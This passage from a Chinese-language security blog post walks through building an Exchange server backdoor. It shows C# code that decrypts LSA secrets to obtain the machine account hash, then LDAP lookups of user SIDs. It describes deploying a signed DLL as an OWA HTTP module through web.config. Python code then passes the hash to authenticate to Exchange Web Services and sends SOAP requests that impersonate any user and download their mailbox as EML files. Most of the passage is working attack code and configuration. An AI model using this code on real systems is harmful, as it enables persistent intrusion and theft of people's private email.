class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><code class="hljs c#"><span class="hljs-function"><span class="hljs-keyword">private</span> <span class="hljs-keyword">static</span> List&lt;<span class="hljs-built_in">string</span>&gt; <span class="hljs-title">ParseLsa</span>(<span class="hljs-params">RegistryHive security, <span class="hljs-built_in">byte</span>[] bootKey, <span class="hljs-keyword">ref</span> RemoteOps remoteConnection</span>)</span><br><span class="hljs-function"></span>        &#123;<br>            <span class="hljs-keyword">try</span><br>            &#123;<br>                <span class="hljs-built_in">byte</span>[] fVal = GetValueKey(security, <span class="hljs-string">@&quot;Policy\PolEKList\Default&quot;</span>).Data;<br>                LsaSecret <span class="hljs-keyword">record</span> = <span class="hljs-keyword">new</span> LsaSecret(fVal);<br>                <span class="hljs-built_in">byte</span>[] dataVal = <span class="hljs-keyword">record</span>.data.Take(<span class="hljs-number">32</span>).ToArray();<br>                <span class="hljs-built_in">byte</span>[] tempKey = Crypto.ComputeSha256(bootKey, dataVal);<br>                <span class="hljs-built_in">byte</span>[] dataVal2 = <span class="hljs-keyword">record</span>.data.Skip(<span class="hljs-number">32</span>).Take(<span class="hljs-keyword">record</span>.data.Length - <span class="hljs-number">32</span>).ToArray();<br>                <span class="hljs-built_in">byte</span>[] decryptedLsaKey = Crypto.DecryptAES_ECB(dataVal2, tempKey).Skip(<span class="hljs-number">68</span>).Take(<span class="hljs-number">32</span>).ToArray();<br><br>                <span class="hljs-comment">//get NLKM Secret</span><br>                <span class="hljs-built_in">byte</span>[] nlkmKey = <span class="hljs-literal">null</span>;<br>                NodeKey nlkm = GetNodeKey(security, <span class="hljs-string">@&quot;Policy\Secrets\NL$KM&quot;</span>);<br>                <span class="hljs-keyword">if</span> (nlkm != <span class="hljs-literal">null</span>)<br>                &#123;<br>                    nlkmKey = DumpSecret(nlkm, decryptedLsaKey);<br>                    &#125;<br>                 <span class="hljs-keyword">foreach</span> (<span class="hljs-function">NodeKey secret <span class="hljs-keyword">in</span> <span class="hljs-title">GetNodeKey</span>(<span class="hljs-params">security, <span class="hljs-string">@&quot;Policy\Secrets&quot;</span></span>).ChildNodes)</span><br><span class="hljs-function"></span>                    &#123;<br>                        <span class="hljs-keyword">if</span> (<span class="hljs-built_in">string</span>.Compare(secret.Name, <span class="hljs-string">&quot;NL$Control&quot;</span>, StringComparison.OrdinalIgnoreCase) != <span class="hljs-number">0</span>)<br>                        &#123;<br>                            <span class="hljs-keyword">if</span> (<span class="hljs-built_in">string</span>.Compare(secret.Name, <span class="hljs-string">&quot;NL$KM&quot;</span>, StringComparison.OrdinalIgnoreCase) != <span class="hljs-number">0</span>)<br>                            &#123;<br>                                LsaSecretBlob secretBlob = <span class="hljs-keyword">new</span> LsaSecretBlob(DumpSecret(secret, decryptedLsaKey));<br>                                <span class="hljs-keyword">if</span> (secretBlob.length &gt; <span class="hljs-number">0</span>)<br>                                &#123;<br>                                    retVal.Add(PrintSecret(secret.Name, secretBlob, <span class="hljs-keyword">ref</span> remoteConnection));<br>                                &#125;<br>                            &#125;<br>                            <span class="hljs-keyword">else</span><br>                            &#123;<br>                                LsaSecretBlob secretBlob = <span class="hljs-keyword">new</span> LsaSecretBlob(nlkmKey);<br>                                <span class="hljs-keyword">if</span> (secretBlob.length &gt; <span class="hljs-number">0</span>)<br>                                &#123;<br>                                    retVal.Add(PrintSecret(secret.Name, secretBlob, <span class="hljs-keyword">ref</span> remoteConnection));<br>                                &#125;<br>                            &#125;<br>                        &#125;<br>                    &#125;<br>                &#125;<br></code></pre></td></tr></table></figure>
<figure class="highlight c#"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs c#"><span class="hljs-function"><span class="hljs-keyword">private</span> <span class="hljs-keyword">static</span> <span class="hljs-built_in">string</span> <span class="hljs-title">PrintSecret</span>(<span class="hljs-params"><span class="hljs-built_in">string</span> keyName, LsaSecretBlob secretBlob, <span class="hljs-keyword">ref</span> G remoteConnection</span>)</span><br><span class="hljs-function"></span>        &#123;<br>            <span class="hljs-built_in">string</span> secretOutput = <span class="hljs-built_in">string</span>.Format(<span class="hljs-string">&quot;[*] &#123;0&#125;\r\n&quot;</span>, keyName);<br>            <span class="hljs-keyword">if</span> (keyName.ToUpper().StartsWith(<span class="hljs-string">&quot;$MACHINE.ACC&quot;</span>))<br>            &#123;<br>                <span class="hljs-built_in">string</span> computerAcctHash = BitConverter.ToString(A.Md4Hash2(secretBlob.secret)).Replace(<span class="hljs-string">&quot;-&quot;</span>, <span class="hljs-string">&quot;&quot;</span>).ToLower();<br>                <span class="hljs-built_in">string</span> domainName = remoteConnection.GetRegistryKeyValue(<span class="hljs-string">@&quot;SYSTEM\CurrentControlSet\Services\Tcpip\Parameters&quot;</span>, <span class="hljs-string">&quot;Domain&quot;</span>);<br>                <span class="hljs-built_in">string</span> computerName = remoteConnection.GetRegistryKeyValue(<span class="hljs-string">@&quot;SYSTEM\CurrentControlSet\Services\Tcpip\Parameters&quot;</span>, <span class="hljs-string">&quot;Hostname&quot;</span>);<br>                secretOutput += <span class="hljs-built_in">string</span>.Format(<span class="hljs-string">&quot;&#123;0&#125;\\&#123;1&#125;$:aad3b435b51404eeaad3b435b51404ee:&#123;2&#125;&quot;</span>, domainName, computerName, computerAcctHash);<br>            &#125;<br><br>            <span class="hljs-keyword">return</span> secretOutput;<br>        &#125;<br></code></pre></td></tr></table></figure>
<p>即可获得机器hash</p>
<h4 id="获得sid"><a href="#获得sid" class="headerlink" title="获得sid"></a>获得sid</h4><p>我们需要获得每个需要下载用户的sid，才能完成用户的模拟。域用户的sid可以通过查询域信息获得，条目为 <code>objectsid</code>。c# 对于 AD 的操作还是非常方便的</p>
<p>通过 <code>DirectoryEntry</code> 即可</p>
<figure class="highlight c#"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs c#"><span class="hljs-function"><span class="hljs-keyword">public</span> SearchResult <span class="hljs-title">GetCurrentFullName</span>(<span class="hljs-params"><span class="hljs-built_in">string</span> user</span>)</span><br><span class="hljs-function"></span>       &#123;<br>           user = Encoding.UTF8.GetString(Convert.FromBase64String(user));<br>           <span class="hljs-built_in">string</span> DomainName = System.Environment.UserDomainName;<br>           DirectoryEntry de = <span class="hljs-keyword">new</span> DirectoryEntry(<span class="hljs-string">&quot;LDAP://&quot;</span> + DomainName);<br>           DirectorySearcher ds = <span class="hljs-keyword">new</span> DirectorySearcher(de);<br>           ds.Filter = (<span class="hljs-string">&quot;(samaccountname=&quot;</span> + user + <span class="hljs-string">&quot;)&quot;</span>);<br>           SearchResult res = ds.FindOne();<br>           <span class="hljs-keyword">return</span> res;<br>       &#125;<br></code></pre></td></tr></table></figure>
<p>通过 <code>DirectoryEntry</code> 类就可以完成域信息的查询，指定filter为 <code>samaccountname</code> 即可获得该用户的域信息</p>
<p>不过这里又一个小坑，大部分的域信息值都是 string 类型，但是 <code>objectsid</code> 值是一个 <code>byte[]</code> 类型的值。好在微软提供了 <code>SecurityIdentifier</code> 类用以转换该值为string类型，即我们常见的 ‘S-1-5-21-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx’ </p>
<figure class="highlight c#"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs c#"><span class="hljs-built_in">byte</span>[] objectsid = (<span class="hljs-built_in">byte</span>[])sr.GetDirectoryEntry().Properties[<span class="hljs-string">&quot;objectSid&quot;</span>][<span class="hljs-number">0</span>];<br>SecurityIdentifier sid = <span class="hljs-keyword">new</span> SecurityIdentifier(objectsid, <span class="hljs-number">0</span>);<br><span class="hljs-built_in">string</span> sid_text = sid.ToString();<br></code></pre></td></tr></table></figure>
<p>这样就成功获得了用户的 sid 。</p>
<h4 id="部署dll"><a href="#部署dll" class="headerlink" title="部署dll"></a>部署dll</h4><p>如上我们的server端就基本完成了，剩下的工作是完成部署。</p>
<p>我们使用vs，新建一个类库项目</p>
<p><img src="/img/article2/image-20220327063423202.png" srcset="/img/loading.gif" alt="image-20220327063423202"></p>
<p>完成代码编写后，编辑编译信息：</p>
<ul>
<li><p>首先去除debug信息</p>
</li>
<li><p>对dll进行自签名</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">项目属性 -&gt; signing -&gt; sign the assembly <span class="hljs-comment"># 即可查看dll信息可以有publictoken</span><br></code></pre></td></tr></table></figure></li>
<li><p>通过命令可查看签名</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs powershell">([<span class="hljs-type">system.reflection.assembly</span>]::loadfile(<span class="hljs-string">&quot;1.dll&quot;</span>)).FullName<br></code></pre></td></tr></table></figure></li>
<li><p>在owa目录下新建bin文件夹，将dll文件放入该文件夹，并编辑 <code>web.config</code> 文件</p>
<p>在 <code>&lt;Module&gt;</code> 标签下添加</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs routeros">&lt;<span class="hljs-builtin-name">add</span> <span class="hljs-attribute">name</span>=<span class="hljs-string">&quot;HttpFilter&quot;</span> <span class="hljs-attribute">type</span>=<span class="hljs-string">&quot;Microsoft.Exchange.HTTPFilter.webFilter,Microsoft.Exchange.HTTPFilter,Version=15.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35&quot;</span>/&gt;<br></code></pre></td></tr></table></figure>
<p><code>name</code> 可以随意填写</p>
<p><code>type</code> 第一个参数为 <code>命名空间+类名</code> 第二个为 dll 名</p>
<p><code>PublicKeyToken</code> 即为签名</p>
</li>
</ul>
<h3 id="Client端"><a href="#Client端" class="headerlink" title="Client端"></a>Client端</h3><p>client基于python编写，通过从server获得的hash与sid，构造请求获得用户的邮件</p>
<h4 id="pth-to-ews"><a href="#pth-to-ews" class="headerlink" title="pth_to_ews"></a>pth_to_ews</h4><p>客户端第一步需要实现的就是通过机器hash认证ews接口。</p>
<p>参考：<a target="_blank" rel="noopener" href="https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Pass-the-Hash-with-Exchange-Web-Service">https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Pass-the-Hash-with-Exchange-Web-Service</a></p>
<p>机器hash基本是无法解密的，所以我们只能使用hash去进行认证。</p>
<p>当然我们可以使用mimikatz进行pth，但是这样太过麻烦，所以我们选择通过代码来进行认证。</p>
<p>这里我参考了三好学生的文章以及 <code>impacket</code> 的 <code>http.py</code> 的代码。</p>
<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2020-5-12/4-1.png" srcset="/img/loading.gif" alt="Alt text"></p>
<p>如图所示，exchange的ews接口支持ntlm认证。这里使用的就是 <code>Net-Ntlm</code></p>
<p>认证流程如下：</p>
<ol>
<li>客户端向服务器发送一个GET请求，请求获得网页内容 </li>
<li>服务器由于开启了NTLM认证，所以返回401，提示需要NTLM认证 </li>
<li>客户端发起NTLM认证，向服务器发送协商消息 </li>
<li>服务器收到消息后，生成一个16位的随机数(这个随机数被称为Challenge),明文发送回客户端 </li>
<li>客户端接收到Challenge后，使用输入的密码hash对Challenge加密，生成response，将response发送给服务器 </li>
<li>服务器接收客户端加密后的response，经过同样的运算，比较结果，若匹配，提供后续服务，否则，认证失败</li>
</ol>
<p>因此我们的登录过程为：</p>
<ul>
<li>模拟NTLM Over HTTP Protocol，直接传入hash，对Challenge加密，生成response，将response发送给服务器</li>
</ul>
<p>Net-Ntlm的格式为：<code>username::domain:challenge:HMAC-MD5:blob</code></p>
<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2018-5-8/2-7.png" srcset="/img/loading.gif" alt="Alt text"></p>
<p>而impacket的ntlm类可以帮我们很好的构造Net-Ntlm结构，代码基本如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">get_session</span>(<span class="hljs-params">host, domain, user, nthash</span>):</span><br>    session = requests.session()<br>    url = <span class="hljs-string">&#x27;https://&#x27;</span>+ host + ews_url<br>    ntlm_nego = ntlm.getNTLMSSPType1(host, domain)<br>    negotiate = base64.b64encode(ntlm_nego.getData())<br>    headers = &#123;<br>        <span class="hljs-string">&quot;Authorization&quot;</span>: <span class="hljs-string">&#x27;NTLM %s&#x27;</span> % negotiate.decode(<span class="hljs-string">&#x27;utf-8&#x27;</span>),<br>        <span class="hljs-string">&quot;Content-type&quot;</span>: <span class="hljs-string">&quot;text/xml; charset=utf-8&quot;</span>,<br>        <span class="hljs-string">&quot;Accept&quot;</span>: <span class="hljs-string">&quot;text/xml&quot;</span>,<br>        <span class="hljs-string">&quot;User-Agent&quot;</span>: <span class="hljs-string">&quot;Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36&quot;</span><br>    &#125;<br>    res = session.get(url,headers=headers,verify=<span class="hljs-literal">False</span>)<br>    ntlm_challenge_b64 = re.search(<span class="hljs-string">&#x27;NTLM ([a-zA-Z0-9+/]+=&#123;0,2&#125;)&#x27;</span>, res.headers[<span class="hljs-string">&#x27;WWW-Authenticate&#x27;</span>]).group(<span class="hljs-number">1</span>)<br>    ntlm_challenge = base64.b64decode(ntlm_challenge_b64)<br>    password1 = <span class="hljs-string">&#x27;&#x27;</span><br>    nt_hash = binascii.unhexlify(nthash)<br>    lm_hash = <span class="hljs-string">&#x27;&#x27;</span>    <br>    ntlm_auth, _ = ntlm.getNTLMSSPType3(ntlm_nego, ntlm_challenge, user, password1, domain, lm_hash, nt_hash)<br>    auth = base64.b64encode(ntlm_auth.getData())<br>    headers = &#123;<br>        <span class="hljs-string">&quot;Authorization&quot;</span>: <span class="hljs-string">&#x27;NTLM %s&#x27;</span> % auth.decode(<span class="hljs-string">&#x27;utf-8&#x27;</span>),<br>        <span class="hljs-string">&quot;Content-type&quot;</span>: <span class="hljs-string">&quot;text/xml; charset=utf-8&quot;</span>,<br>        <span class="hljs-string">&quot;Accept&quot;</span>: <span class="hljs-string">&quot;text/xml&quot;</span>,<br>        <span class="hljs-string">&quot;User-Agent&quot;</span>: <span class="hljs-string">&quot;Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36&quot;</span><br>    &#125;<br>    session.get(url,headers=headers,verify=<span class="hljs-literal">False</span>)    <br>    <span class="hljs-keyword">return</span> session<br><br></code></pre></td></tr></table></figure>
<h4 id="soap请求"><a href="#soap请求" class="headerlink" title="soap请求"></a>soap请求</h4><p>ews接口是exchange提供的web service，我们可以通过soap请求对用户的邮箱进行多种操作。</p>
<p>而当认证用户是机器用户时，支持通过用户sid来模拟任一用户的身份（该功能只限机器用户，管理员组无此权限）</p>
<p>对与机器用户，只需在请求中加上认证头标签，即可模拟任意用户</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-tag">&lt;<span class="hljs-name">soap:Header</span>&gt;</span><br>     &lt;t:RequestServerVersion Version=&quot;Exchange2013&quot; /&gt;<br>     &lt;t:SerializedSecurityContext&gt;<br>         &lt;t:UserSid&gt;sid&lt;/t:UserSid&gt;<br>         &lt;t:GroupSids&gt;<br>             &lt;t:GroupIdentifier&gt;<br>                 &lt;t:SecurityIdentifier&gt;sid&lt;/t:SecurityIdentifier&gt;<br>             &lt;/t:GroupIdentifier&gt;<br>         &lt;/t:GroupSids&gt;<br>     &lt;/t:SerializedSecurityContext&gt;<br> <span class="hljs-tag">&lt;/<span class="hljs-name">soap:Header</span>&gt;</span><br></code></pre></td></tr></table></figure>
<p>通过soap请求获取邮件可以参考MS的官方文档，通过以下几个步骤</p>
<h5 id="获取邮件数量"><a href="#获取邮件数量" class="headerlink" title="获取邮件数量"></a>获取邮件数量</h5><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-meta">&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;</span><br>    <span class="hljs-tag">&lt;<span class="hljs-name">soap:Envelope</span> <span class="hljs-attr">xmlns:xsi</span>=<span class="hljs-string">&quot;http://www.w3.org/2001/XMLSchema-instance&quot;</span> </span><br><span class="hljs-tag">    <span class="hljs-attr">xmlns:m</span>=<span class="hljs-string">&quot;http://schemas.microsoft.com/exchange/services/2006/messages&quot;</span> </span><br><span class="hljs-tag">    <span class="hljs-attr">xmlns:t</span>=<span class="hljs-string">&quot;http://schemas.microsoft.com/exchange/services/2006/types&quot;</span> </span><br><span class="hljs-tag">    <span class="hljs-attr">xmlns:soap</span>=<span class="hljs-string">&quot;http://schemas.xmlsoap.org/soap/envelope/&quot;</span>&gt;</span><br>        <span class="hljs-tag">&lt;<span class="hljs-name">soap:Body</span>&gt;</span><br>            &lt;m:GetFolder&gt;<br>                &lt;m:FolderShape&gt;<br>                    &lt;t:BaseShape&gt;Default&lt;/t:BaseShape&gt;<br>                &lt;/m:FolderShape&gt;<br>                &lt;m:FolderIds&gt;<br>                    &lt;t:DistinguishedFolderId Id=&quot;inbox&quot;&gt;<br>                        &lt;t:Mailbox&gt;<br>                            &lt;t:EmailAddress&gt;admin@cia.local&lt;/t:EmailAddress&gt;<br>                        &lt;/t:Mailbox&gt;<br>                    &lt;/t:DistinguishedFolderId&gt;<br>                &lt;/m:FolderIds&gt;<br>            &lt;/m:GetFolder&gt;<br>        <span class="hljs-tag">&lt;/<span class="hljs-name">soap:Body</span>&gt;</span><br>    <span class="hljs-tag">&lt;/<span class="hljs-name">soap:Envelope</span>&gt;</span><br></code></pre></td></tr></table></figure>
<p><code>&lt;t:TotalCount&gt;</code> 标签内返回的就是邮件数量</p>
<h5 id="列举邮箱"><a href="#列举邮箱" class="headerlink" title="列举邮箱"></a>列举邮箱</h5><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><code class="hljs xml">&#x27;<span class="hljs-meta">&lt;?xml version=&#x27;1.0&#x27; encoding=&#x27;utf-8&#x27;?&gt;</span><br>    &lt;soap:Envelope<br>    xmlns:soap=&#x27;http://schemas.xmlsoap.org/soap/envelope/&#x27;<br>    xmlns:t=&#x27;http://schemas.microsoft.com/exchange/services/2006/types&#x27;<br>    xmlns:m=&#x27;http://schemas.microsoft.com/exchange/services/2006/messages&#x27;<br>    xmlns:xsi=&#x27;http://www.w3.org/2001/XMLSchema-instance&#x27;&gt;<br>    <span class="hljs-tag">&lt;<span class="hljs-name">soap:Body</span>&gt;</span><br>        &lt;m:FindItem Traversal=&#x27;Shallow&#x27;&gt;<br>        &lt;m:ItemShape&gt;<br>            &lt;t:BaseShape&gt;AllProperties&lt;/t:BaseShape&gt;<br>        &lt;/m:ItemShape&gt;<br>        &lt;m:IndexedPageItemView MaxEntriesReturned=&quot;100&quot; Offset=&quot;0&quot; BasePoint=&quot;Beginning&quot; /&gt;<br>        &lt;m:ParentFolderIds&gt;<br>            &lt;t:DistinguishedFolderId Id=&#x27;inbox&#x27;&gt;<br>            &lt;t:Mailbox&gt;<br>                &lt;t:EmailAddress&gt;admin@cia.local&lt;/t:EmailAddress&gt;<br>            &lt;/t:Mailbox&gt;<br>            &lt;/t:DistinguishedFolderId&gt;<br>        &lt;/m:ParentFolderIds&gt;<br>        &lt;/m:FindItem&gt;<br>    <span class="hljs-tag">&lt;/<span class="hljs-name">soap:Body</span>&gt;</span><br>    <span class="hljs-tag">&lt;/<span class="hljs-name">soap:Envelope</span>&gt;</span><br></code></pre></td></tr></table></figure>
<p>该返回包会返回每一封邮件的信息，寄件人、title、日期等，但不会返回具体的内容和附件。</p>
<p>该返回包会返回 <code>ChangeKey</code> 和 <code>ItemId</code> 两个参数，通过他们可以获得具体的邮件内容</p>
<h4 id="mime-to-eml"><a href="#mime-to-eml" class="headerlink" title="mime_to_eml"></a>mime_to_eml</h4><p>ews支持直接通过MIME格式返回数据。mime为对整个eml文件进行base64编码后的数据流。这样获取数据比较方便，不用再单独下载附件。</p>
<p>我们只需要在body中加入</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs xml">&lt;t:IncludeMimeContent&gt;true&lt;/t:IncludeMimeContent&gt;<br></code></pre></td></tr></table></figure>
<p>即可请求MIME格式数据</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-meta">&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;</span><br>    <span class="hljs-tag">&lt;<span class="hljs-name">soap:Envelope</span> <span class="hljs-attr">xmlns:xsi</span>=<span class="hljs-string">&quot;http://www.w3.org/2001/XMLSchema-instance&quot;</span> </span><br><span class="hljs-tag">    <span class="hljs-attr">xmlns:m</span>=<span class="hljs-string">&quot;http://schemas.microsoft.com/exchange/services/2006/messages&quot;</span> </span><br><span class="hljs-tag">    <span class="hljs-attr">xmlns:t</span>=<span class="hljs-string">&quot;http://schemas.microsoft.com/exchange/services/2006/types&quot;</span> </span><br><span class="hljs-tag">    <span class="hljs-attr">xmlns:soap</span>=<span class="hljs-string">&quot;http://schemas.xmlsoap.org/soap/envelope/&quot;</span>&gt;</span><br>      <span class="hljs-tag">&lt;<span class="hljs-name">soap:Body</span>&gt;</span><br>        &lt;m:GetItem&gt;<br>          &lt;m:ItemShape&gt;<br>            &lt;t:BaseShape&gt;IdOnly&lt;/t:BaseShape&gt;<br>            &lt;t:BodyType&gt;Text&lt;/t:BodyType&gt;<br>            &lt;t:IncludeMimeContent&gt;true&lt;/t:IncludeMimeContent&gt;<br>          &lt;/m:ItemShape&gt;<br>          &lt;m:ItemIds&gt;<br>            &lt;t:ItemId Id=&quot;ItemId&quot; ChangeKey=&quot;ChangeKey&quot; /&gt;<br>          &lt;/m:ItemIds&gt;<br>        &lt;/m:GetItem&gt;<br>      <span class="hljs-tag">&lt;/<span class="hljs-name">soap:Body</span>&gt;</span><br>    <span class="hljs-tag">&lt;/<span class="hljs-name">soap:Envelope</span>&gt;</span><br></code></pre></td></tr></table></figure>
<p>返回的MIME数据在 <code>&lt;t:MimeContent CharacterSet=&quot;UTF-8&quot;&gt;</code> 标签中</p>
<p>将该数据进行base64解码，即可获得eml数据，将其保存为eml文件。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs python">a = <span class="hljs-built_in">open</span>(dir1+<span class="hljs-string">&#x27;\\&#x27;</span>+topic+<span class="hljs-string">&#x27;.eml&#x27;</span>,<span class="hljs-string">&#x27;w&#x27;</span>)<br>a.write(<span class="hljs-built_in">str</span>(base64.b64decode(mimetext.encode(<span class="hljs-string">&quot;utf-8&quot;</span>)), <span class="hljs-string">&quot;utf-8&quot;</span>))<br></code></pre></td></tr></table></figure>
<p>使用邮箱软件或浏览器即可打开，会自动帮助我们解码。</p>
<hr>
<p>至此，我们的后门程序就基本完成了</p>
<h3 id="一些其他细节"><a href="#一些其他细节" class="headerlink" title="一些其他细节"></a>一些其他细节</h3><h5 id="负载"><a href="#负载" class="headerlink" title="负载"></a>负载</h5><p>目前遇到的一个问题是存在负载的话认证的session即不能成功认证，目前还是采取最粗暴的方式，重放数据包，，打算的解决方式是通过机器名进行filter，如果负载收到不是给自己发送的数据就发送给该机器再获得返回。</p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/AD/">AD</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/AD/">AD</a>
                    
                      <a class="hover-with-bg" href="/tags/Exchange/">Exchange</a>
                    
                      <a class="hover-with-bg" href="/tags/Dev/">Dev</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！</p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2022/05/12/%E5%8F%88%E4%B8%80%E4%B8%AAADCS%E6%8F%90%E6%9D%83/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">CVE-2022-26923——又一个ADCS提权</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2022/02/16/WriteSPN%E6%BB%A5%E7%94%A8/">
                        <span class="hidden-mobile">WriteSPN滥用</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;TOC</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  

  

  
</footer>

<!-- SCRIPTS -->

  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js" ></script>
